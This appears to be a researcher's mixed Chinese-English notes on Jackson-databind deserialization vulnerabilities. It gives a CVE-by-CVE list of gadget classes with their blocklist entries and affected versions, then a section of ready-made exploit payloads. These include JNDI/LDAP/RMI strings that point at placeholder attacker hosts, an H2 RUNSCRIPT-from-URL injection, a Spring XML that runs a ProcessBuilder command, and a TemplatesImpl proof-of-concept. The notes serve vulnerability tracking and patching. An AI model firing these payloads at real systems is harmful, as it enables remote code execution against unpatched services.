Jackson
黑盒检测
增加一个key-value
{"
gadget
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
sun.reflect.annotation.AnnotationInvocationHandler
java.util.LinkedHashSet
org.springframework.context.support.FileSystemXmlApplicationContext
gadget原理参考文章
https://b1ngz.github.io/java-deserialization-jdk7u21-gadget-note/ Jdk7u21
https://www.cnblogs.com/hucn/p/3636912.html javassist
https://docs.oracle.com/javase/specs/jls/se7/html/jls-8.html#jls-8.7 Java static initializer
https://stackoverflow.com/a/8100407/6467552 Class.forName("SomeClass")和 ClassLoader.loadClass("SomeClass")
https://www.jianshu.com/p/c959666cd8dd h2数据库使用
https://blog.csdn.net/shanshiping/article/details/51444229 h2数据库远程连接配置
https://github.com/FasterXML/jackson-docs/wiki/ 官方wiki
依赖jar包
jackson-databind.*jar jackson-annotations.*jar jackson-core.*jar logback-core.*jar h2-.*jar
漏洞跟踪
CVE-2020-25649
Synopsis: Important:Red Hat JBoss Enterprise Application Platform 7.3 security update
Security Fix(es): * jackson-databind: FasterXML DOMDeserializer insecure entity expansion is vulnerable to XML external entity
CVE-2020-24750
Security Fix(es): * jackson-databind: Serialization gadgets in com.pastdev.httpcomponents.configuration.JndiConfiguration
CVE-2020-24616
Another gadget type(s) reported regarding class(es) of br.com.anteros:Anteros-DBCP library.
CVE-2020-14195
Another gadget type(s) reported regarding class(es) of org.jsecurity:jsecurity. library.
Fix will likely be included in: 2.9.10.5 Not considered valid CVE for Jackson 2.10.0 and later
jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).
CVE-2020-14062
Another gadget type(s) reported regarding class(es) of com.sun.xml.parsers:jaxp-ri (in shaded copy of Xalan2).
Fix will be included in:2.9.10.5 Not considered valid CVE for Jackson 2.10.0 and later
jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related
to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool(aka xalan2).
CVE-2020-14061
Another gadget type(s) reported regarding class(es) of aqapi.jar library, included in Weblogic (for Oracle AQ/JMS support).
Fix will be included in:2.9.10.5 Not considered valid CVE for Jackson 2.10.0 and later
jackson-databind: serialization in weblogic/oracle-aqjms
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related
to oracle.jms.AQjmsQueueConnectionFactory,oracle.jms.AQjmsXATopicConnectionFactory,oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms).
CVE-2020-14060
Another gadget type(s) reported regarding class(es) of org.apache.drill.exec:drill-jdbc-all. library.
Fix is included in:2.9.10.5 Not considered valid CVE for Jackson 2.10.0 and later
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing,
related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool(aka apache/drill).
CVE-2020-11620
Another gadget type(s) reported regarding class(es) of commons-jelly:commons-jelly. library.
Fix will be included in: 2.9.10.4 Does not affect 2.10.0 and later
CVE-2020-11619
Another gadget type(s) reported regarding class(es) of org.springframework:spring-aop. library.
Fix will be included in:2.9.10.4 Does not affect 2.10.0 and later
jackson-databind: Serialization gadgets in org.springframework:spring-aop
CVE-2020-11113
Another gadget type(s) reported regarding class(es) of org.apache.openjpa:openjpa. library.
Fix will be included in: 2.9.10.4 Does not affect 2.10.0 and later
CVE-2020-11112
Another gadget type(s) reported regarding a class of org.apache.commons:commons-proxy library.
Fix will be included in: 2.9.10.4 Does not affect 2.10.0 and later
CVE-2020-11111
Another gadget type(s) reported regarding classes of org.apache.activemq:activemq-pool, org.apache.activemq:activemq-pool-jms libraries.
Fix will be included in: 2.9.10.4 Does not affect 2.10.0 and later
CVE-2020-10969
Another gadget type reported regarding a class in javax.swing package.
FasterXML jackson-databind 2.9.10.4之前的2.x版本中的javax.swing.JEditorPane存在代码问题漏洞。远程攻击者可借助特制输入利用该漏洞在系统上执行任意代码。
Serialization gadgets in javax.swing.JEditorPane
CVE-2020-10968
Another gadget type(s) reported regarding a class of aoju/bus-proxy library.
Fix will likely be included in: 2.9.10.4 Does not affect 2.10.0 and later
jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider
CVE-2020-10673
Another gadget type(s) reported regarding a class of caucho-quercus library
Fix will likely be included in: 2.9.10.4 Does not affect 2.10.0 and later
CVE-2020-10672
Another gadget type(s) reported regarding class(es) oforg.apache.aries.transaction.jms.
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).
Fix will likely be included in: 2.9.10.4 Does not affect 2.10.0 and later
CVE-2020-10650
Another gadget type reported regarding a class of ignite-jta.
CVE-2020-9547 / CVE-2020-9548
Another 2 gadget type reported regarding a classes of ibatis-sqlmap and Anteros-Core packages.
CVE-2020-9546
Another gadget type reported regarding a class of [TO BE ADDED].
Fix will be included in: 2.9.10.4 2.8.11.6 (jackson-bom version 2.8.11.20200310) 2.7.9.7 Does not affect 2.10.0 and later
DESCRIPTION: FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system,
caused by the mishandling of interaction between serialization gadgets and typing in
org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).
By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.
jackson-databind: Serialization gadgets in shaded-hikari-config
CVE-2020-8840
Another gadget (*) type reported related to JNDI access.
Fixed in: 2.9.10.3 (jackson-bom version 2.9.10.20200223) 2.8.11.5 (jackson-bom version 2.8.11.20200210) 2.7.9.7 does not affect 2.10.0 and later
jackson-databind: Lacks certain xbean-reflect/JNDI blocking
CVE-2019-20330
Another 2 gadget (*) types reported related to JNDI access.
Fixed in: 2.9.10.2 (jackson-bom version 2.9.10.20200223) 2.8.11.5 (jackson-bom version 2.8.11.20200210) 2.7.9.7
does not affect 2.10.0 and later
In jackson-databind 2.9.10, you have ban two gadget type ("net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup" and "net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup").
CVE-2019-17531
Another gadget type reported regarding a class of apache-log4j-extras package.
Fix will be included in: 2.9.10.1 2.8.11.5 2.6.7.3 does not affect 2.10.0 and later
#2498: Block one more gadget type (log4j-extras/1.2)
// [databind#2498]: log4j-extras (1.2)
s.add("org.apache.log4j.receivers.db.DriverManagerConnectionSource");
s.add("org.apache.log4j.receivers.db.JNDIConnectionSource");
CVE-2019-17267
Another gadget (*) type report regarding a class of ehcache package
Fix included in: 2.9.10 2.8.11.5 does not affect 2.10.0 and later
#2460: Block one mode gadget type (ehcache, no CVE allocated yet)
s.add("net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup");
CVE-2019-16942 / CVE-2019-16943
Another 2 gadget (*) types reported regarding classes of commons-dbcp and p6spy packages
Fixed in: 2.9.10.1 (use jackson-bom version 2.9.10.20191020) 2.6.7.3 2.8.11.5 does not affect 2.10.0 and later
CVE-2019-16335
Blocked added in 2.9 to be included in 2.9.10. Also backport in 2.8 branch but uncertain if new micro-patch will be released (but if it is, that'd be2.8.11.5)
CVE-2019-14893
Another gadget (*) type report regarding a class of xalan.
2.9.10 2.8.11.5 does not affect 2.10.0 and later
Block one more gadget type (xalan2)
CVE-2019-14892
Another gadget (*) type report regarding a class of commons-configuration (and later commons-configuration2) package(s)
Fixed in: 2.9.10 and later 2.8.11.5 2.6.7.3 does not affect 2.10.0 and later
FasterXML jackson-databind 2.6.7及之后版本(2.6.7.3版本已修复)、
2.8.0及之后版本(2.8.11.5版本已修复)和2.9.0版本及之后版本(2.9.10版本已修复)中存在代码问题漏洞。攻击者可利用该漏洞执行任意代码
CVE-2019-14661 / CVE-2019-14060 / CVE-2019-14662
CVE-2019-14060
DESCRIPTION: FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization in oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill). By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVE-2019-14661
DESCRIPTION: FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization in oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms). By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVE-2019-14662
DESCRIPTION: FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2). By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVE-2019-14540
Another gadget (*) type report regarding HikariConfig, via HikariDataSource
Fixed in: 2.9.10 2.8.11.5 2.6.7.3 does not affect 2.10.0 and later
// [databind#2449]: and sub-class thereof
s.add("com.zaxxer.hikari.HikariDataSource");
CVE-2019-14439
针对CVE-2019-12384漏洞绕过
Another gadget type report regarding logback/JNDI.
Fixed in: 2.9.10 2.8.11.4 2.7.9.6 2.6.7.3
CVE-2019-14379
Another gadget type reported regarding a class of ehcache package.
Fixed in: 2.9.10 2.8.11.4 2.7.9.6 2.6.7.3
CVE-2019-14361针对CVE-2019-12384漏洞绕过
CVE-2019-12814
Similar to other polymorphic types with no limits, but for XXE with jdom2.jar
Fixed in: 2.9.10 2.8.11.4 2.7.9.6 2.6.7.3
// [databind#2341]: jdom/jdom2
s.add("org.jdom.transform.XSLTransformer");
s.add("org.jdom2.transform.XSLTransformer");
CVE-2019-12384
// [databind#2334] (2.9.9.1): logback-core
s.add("ch.qos.logback.core.db.DriverManagerConnectionSource");
CVE-2019-12086
// [databind#2326] (2.7.9.6): one more 3rd party gadget
s.add("com.mysql.cj.jdbc.admin.MiniAdmin");
CVE-2018-1000873
Performance issue with malicious `BigDecimal` input, `InstantDeserializer`, `DurationDeserializer`
CVE-2018-19360 / CVE-2018-19361 / CVE-2018-19362FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the axis2-transport-jms class from polymorphic deserialization.
Fixed in: 2.9.8 and later 2.8.11.3 2.7.9.5 2.6.7.3
// [databind#2186]: yet more 3rd party gadgets
s.add("org.jboss.util.propertyeditor.DocumentEditor");
s.add("org.apache.openjpa.ee.RegistryManagedRuntime");
s.add("org.apache.openjpa.ee.JNDIManagedRuntime");
s.add("org.apache.axis2.transport.jms.JMSOutTransportInfo");
CVE-2018-14721 / CVE-2018-14720 / CVE-2018-14719 / CVE-2018-14718
This issue covers following CVEs related to polymorphic deserialization, gadgets:
CVE-2018-14718: RCE with slf4j-ext jar
CVE-2018-14719: RCE with blaze-ds-opt, -core jars
CVE-2018-14720: exfiltration/XXE with only JDK classes (some JDK versions)
CVE-2018-14721: exfiltration/SSRF with axis2-jaxws
Fixed in: 2.9.7 and later 2.8.11.3 2.7.9.5 2.6.7.3
#2097: Block more classes from polymorphic deserialization (CVE-2018-14718 - CVE-2018-14721)
// [databind#2097]: some 3rd party, one JDK-bundled s.add("org.slf4j.ext.EventData"); s.add("flex.messaging.util.concurrent.AsynchBeansWorkManagerExecutor"); s.add("com.sun.deploy.security.ruleset.DRSHelper"); s.add("org.apache.axis2.jaxws.spi.handler.HandlerResolverImpl");
CVE-2018-12023
There is a potential remote code execution (RCE) vulnerability, if user is
1.handling untrusted content (where attacker can craft JSON)
2.using "Default Typing" feature (or equivalent;polymorphic value with base type of java.lang.Object
3.has oracle JDBC driver jar in classpath
4.allows connections from service to untrusted hosts (where attacker can run an LDAP service)
Fixed in: 2.9.6 and later 2.8.11.2 2.7.9.4 2.6.7.3
// [databind#2058]: Oracle JDBC driver, with jndi/ldap lookup s.add("oracle.jdbc.connector.OracleManagedConnectionFactory"); s.add("oracle.jdbc.rowset.OracleJDBCRowSet");
CVE-2018-12022
There is a potential remote code execution (RCE) vulnerability, if user is
1.handling untrusted content (where attacker can craft JSON)
2.using "Default Typing" feature (or equivalent; polymorphic value with base type of java.lang.Object
3.has jodd-db (https://jodd.org/db/) jar in classpath
4.allows connections from service to untrusted hosts (where attacker can run an LDAP service)
Fixed in: 2.9.6 and later 2.8.11.2 2.7.9.4 2.6.7.3
// [databind#2052]: ldap approaches; in all cases LDAP connection String is passed // and access attempt is made: s.add("oracle.jdbc.connector.OracleManagedConnectionFactory"); s.add("jodd.db.connection.DataSourceConnectionProvider"); s.add("oracle.jdbc.rowset.OracleJDBCRowSet");
CVE-2018-11307
A new potential gadget type from MyBatis (https://github.com/mybatis/mybatis-3) has been reported.
It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled.
Fixed in 2.9.5 and later 2.8.11.2 2.7.9.4 2.6.7.3
// [databind#2032]: more 3rd party; data exfiltration via xml parsed ext entities s.add("org.apache.ibatis.parsing.XPathParser");
CVE-2018-7489
Block two more gadgets to exploit default typing issue
CVE-2018-5968
#1872 `NullPointerException` in `SubTypeValidator.validateSubType` when #1899: Another two gadgets to exploit default typing issue in jackson-databind (reported by OneSourceCat@github)
// [databind#1899]: more 3rd party s.add("org.hibernate.jmx.StatisticsService"); s.add("org.apache.ibatis.datasource.jndi.JndiDataSourceFactory");
CVE-2017-17485
More potential deserialization gadgets reported for:
DBCP types (similar to c3p0 ones already included)
Spring framework AOP helpers
Spring framework application context
For some of these need to check parent hierarchy.
Fixed in: 2.9.4 2.8.11 2.7.9.2 2.6.7.3 Not applicable to 2.10.0 or later
CVE-2017-15095
Block more JDK types from polymorphic deserialization (CVE 2017-15095) #1737
CVE-2017-7525
Jackson Deserializer security vulnerability via default typing (CVE-2017-7525) #1599
A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9
受影响产商相关链接
https://www.ibm.com/support/pages/node/6348046
https://www.ibm.com/support/pages/node/6343203
https://www.ibm.com/support/pages/node/6324677
https://access.redhat.com/errata/RHSA-2020:4173
https://packetstormsecurity.com/files/159724/Red-Hat-Security-Advisory-2020-4366-01.html
https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-July-2020-32829
https://www.oracle.com/security-alerts/cpujul2020.html
https://security-tracker.debian.org/tracker/source-package/jackson-databind
https://www.debian.org/security/2019/dsa-4542
https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html
https://github.com/folio-org/raml-module-builder/pull/549
https://github.com/SeldonIO/seldon-core/issues/981
https://github.com/akka/akka-http/pull/2688
https://github.com/dakrone/cheshire/issues/155
https://github.com/swagger-api/swagger-codegen/pull/9584
CVE-2020-24750
影响版本
FasterXML jackson-databind 2.0系列2.9.10.6之前版本
CVE-2020-24616
影响版本
FasterXML jackson-databind 2.x系列中2.9.10.6之前版本
利用类
br.com.anteros:Anteros-DBCP org.arrahtec:profiler-core com.nqadmin.rowset:jdbcrowsetimpl
com.pastdev.httpcomponents:configuration
org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl
CVE-2020-14060
影响版本
jackson-databind before 2.9.10.4
jackson-databind before 2.8.11.6
jackson-databind before 2.7.9.7
利用条件
1.开启enableDefaultTyping()
2.使用了org.apache.drill.exec:drill-jdbc-all第三方依赖
CVE-2020-11113
影响版本
Jackson-databind 2.x before 2.9.10.4
CVE-2020-10673
影响版本
Version <= FasterXML jackson-databind 2.9.10.3
Payload
com.caucho.config.types.ResourceRef.
CVE-2020-9548
影响版本
jackson-databind < 2.10.0
Payload
\"br.com.anteros.dbcp.AnterosDBCPConfig\", {\"healthCheckRegistry\": \"ldap|RMI://[IP]:[Port]/[Exploit]\"}
CVE-2020-9547
Payload
\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\", {\"properties\": {\"UserTransaction\":\"ldap|RMI://[IP]:[Port]/[Exploit]\"}}
poc
["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig", {"properties": {"UserTransaction":"ldap://[IP]:[Port]/[EvilObject]"}}
CVE-2020-8840
影响版本
2.0.0 <= Jackson-databind <= 2.9.10.2(Jackson-databind 2.8.11.5不受影响)
利用条件
开启autoType功能
利用类
org.apache.xbean.propertyeditor.JndiConverter
poc
["org.apache.xbean.propertyeditor.JndiConverter", {"asText":"ldap://IP:[Port]/[EvilObject]"}]
CVE-2020-10969
影响版本
jackson-databind before 2.9.10.3 jackson-databind before 2.10.2
利用条件
开启enableDefaultTyping()
Payload
\"javax.swing.JEditorPane\",{\"page\":\"http://xxx.dnslog.cn\"}
poc
["javax.swing.JEditorPane",{"page":"http://xxx.dnslog.cn"}]
CVE-2019-14439
影响版本
Jackson-databind < 2.9.9.2
Jackson-databind < 2.10.0
Jackson-databind < 2.7.9.6
Jackson-databind < 2.8.11.4
CVE-2019-14361
影响版本
Jackson-databind < 2.9.9.2 Jackson-databind < 2.10.0 Jackson-databind < 2.7.9.6 Jackson-databind < 2.8.11.4 Jackson-databind < 2.6.7.3
CVE-2019-12384
Payload
//SSRF \"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://127.0.0.1:8005/~/test\"} //RCE \"ch.qos.logback.core.db.DriverManagerConnectionSource\"{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost/inject.sql'\"}
CVE-2019-12814 | Jackson JDOM(反序列化和XXE的组合利用)
影响版本
Jackson 2.x ~2.9.9
利用条件
1.开启enableDefaultTyping 2.使用了JDOM 1.x 或 JDOM 2.x 依赖
CVE-2019-12086
影响版本
Jackson-databind 2.x before 2.9.9
利用条件
1.在开启Default Typing的情况下,
2.classpath中存在mysql-connector-java 8.0.15版本(2019.2.1发布)以下
Payload
"com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_Host:Port/foo"
CVE-2017-17485
Payload
//touch { "param": [ "org.springframework.context.support.FileSystemXmlApplicationContext", "[Host]/spel.xml" ] } //spel.xml <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd "> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <array> <value>touch</value> <value>/tmp/prove2.txt</value> </array> </constructor-arg> <property name="any" value="#{ pb.start() }"/> </bean> </beans>
CVE-2017-7525
POC
//touch { "param": [ "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", { "transletBytecodes":
["Base64_POC" ],
"transletName": "a.b", "outputProperties": {}
}
]
}
package net.xxx; import com.fasterxml.jackson.databind.ObjectMapper; import java.io.IOException; public class Main { public static void main(String[] args) { String json = "[\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", {\"transletBytecodes\": [\"Base64_POC\"], \"transletName\": \"a.b\", \"outputProperties\": {} }]"; try { ObjectMapper objectMapper = new ObjectMapper(); objectMapper.enableDefaultTyping(); Object o = objectMapper.readValue(json, Object.class); System.out.println(o); } catch (IOException e) { e.printStackTrace(); } } }
相关gadget
org.apache.commons.collections.functors.InvokerTransformer
org.apache.commons.collections.functors.InstantiateTransformer
org.apache.commons.collections4.functors.InvokerTransformer
org.apache.commons.collections4.functors.InstantiateTransformer
org.codehaus.groovy.runtime.ConvertedClosure
org.codehaus.groovy.runtime.MethodClosure
org.springframework.beans.factory.ObjectFactory
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
org.apache.xalan.xsltc.trax.TemplatesImpl
com.sun.rowset.JdbcRowSetImpl
java.util.logging.FileHandler
java.rmi.server.UnicastRemoteObject
org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor
org.springframework.beans.factory.config.PropertyPathFactoryBean
com.mchange.v2.c3p0.JndiRefForwardingDataSource
com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
漏洞修复跟踪
源码跟踪
release-notes/VERSION
src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java
src/test/java/com/fasterxml/jackson/databind/interop/IllegalTypesCheckTest.java
src/main/java/com/fasterxml/jackson/databind/deser/BeanDeserializerFactory.java
src/test/java/com/mchange/v2/c3p0/jacksontest/ComboPooledDataSource.java
issues跟踪
https://github.com/FasterXML/jackson-databind/issues/2827
https://github.com/FasterXML/jackson-databind/issues/2826
https://github.com/FasterXML/jackson-databind/issues/2814
https://github.com/FasterXML/jackson-databind/issues/2798
https://github.com/FasterXML/jackson-databind/issues/2765
https://github.com/FasterXML/jackson-databind/issues/2704
https://github.com/FasterXML/jackson-databind/issues/2698
https://github.com/FasterXML/jackson-databind/issues/2688
https://github.com/FasterXML/jackson-databind/issues/2682
https://github.com/FasterXML/jackson-databind/issues/2680
https://github.com/FasterXML/jackson-databind/issues/2670
https://github.com/FasterXML/jackson-databind/issues/2666
https://github.com/FasterXML/jackson-databind/issues/2664
https://github.com/FasterXML/jackson-databind/issues/2662
https://github.com/FasterXML/jackson-databind/issues/2660
https://github.com/FasterXML/jackson-databind/issues/2659
https://github.com/FasterXML/jackson-databind/issues/2658
https://github.com/FasterXML/jackson-databind/issues/2642
https://github.com/FasterXML/jackson-databind/issues/2460
https://github.com/FasterXML/jackson-databind/issues/2634
https://github.com/FasterXML/jackson-databind/issues/2631
https://github.com/FasterXML/jackson-databind/issues/2620
https://github.com/FasterXML/jackson-databind/issues/2526
https://github.com/FasterXML/jackson-databind/issues/2521
https://github.com/FasterXML/jackson-databind/issues/2498
https://github.com/FasterXML/jackson-databind/issues/2478
https://github.com/FasterXML/jackson-databind/issues/2469
https://github.com/FasterXML/jackson-databind/issues/2462
https://github.com/FasterXML/jackson-databind/issues/2449
https://github.com/FasterXML/jackson-databind/issues/2410
https://github.com/FasterXML/jackson-databind/issues/2389
https://github.com/FasterXML/jackson-databind/issues/2387
https://github.com/FasterXML/jackson-databind/issues/2341
https://github.com/FasterXML/jackson-databind/issues/2186
https://github.com/FasterXML/jackson-databind/issues/2141
https://github.com/FasterXML/jackson-databind/issues/2097
https://github.com/FasterXML/jackson-databind/issues/2058
https://github.com/FasterXML/jackson-databind/issues/2052
https://github.com/FasterXML/jackson-databind/issues/2032
https://github.com/FasterXML/jackson-databind/issues/1931
https://github.com/FasterXML/jackson-databind/issues/1899
https://github.com/FasterXML/jackson-databind/issues/1872
https://github.com/FasterXML/jackson-databind/issues/1855
https://github.com/FasterXML/jackson-databind/issues/1737
https://github.com/FasterXML/jackson-databind/issues/1723
https://github.com/FasterXML/jackson-databind/issues/1680
https://github.com/FasterXML/jackson-databind/issues/1599
https://github.com/FasterXML/jackson-modules-java8/issues/90
https://github.com/FasterXML/jackson-modules-java8/pull/87
https://github.com/FasterXML/jackson-modules-java8/pull/85
https://github.com/FasterXML/jackson-modules-java8/pull/84
修复跟踪
https://github.com/FasterXML/jackson-databind/commit/a424c038ba0c0d65e579e22001dec925902ac0ef
https://github.com/FasterXML/jackson-databind/commit/998efd708284778f29d83d7962a9bd935c228317
https://github.com/atlassian/jackson-1/commit/086ce2167022084ca9b496fb86e350897b8b7830
https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb
https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0
https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5
https://github.com/marco-schmidt/am/commit/9a566b5a6b4870ccf4e50126b1e49d13c0ebf692
https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db
https://github.com/FasterXML/jackson-databind/commit/ad418eeb974e357f2797aef64aa0e3ffaaa6125b
https://github.com/FasterXML/jackson-databind/commit/c9ef4a10d6f6633cf470d6a469514b68fa2be234
https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737
https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1
https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a
https://github.com/FasterXML/jackson-databind/commit/72cd4025a229fb28ec133235003dd4616f70afaa
https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b
https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44
https://github.com/FasterXML/jackson-databind/commit/6ce32ffd18facac6abdbbf559c817b47fcb622c1
https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2
https://github.com/FasterXML/jackson-databind/commit/ddfddfba6414adbecaff99684ef66eebd3a92e92
https://github.com/FasterXML/jackson-databind/commit/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05
https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1
相关文章
https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
https://medium.com/@cowtowncoder/jackson-2-11-features-40cdc1d2bdf3
https://medium.com/@cowtowncoder/jackson-2-10-safe-default-typing-2d018f0ce2ba
https://medium.com/@cowtowncoder/jackson-2-10-features-cd880674d8a2
https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
https://xz.aliyun.com/t/8011
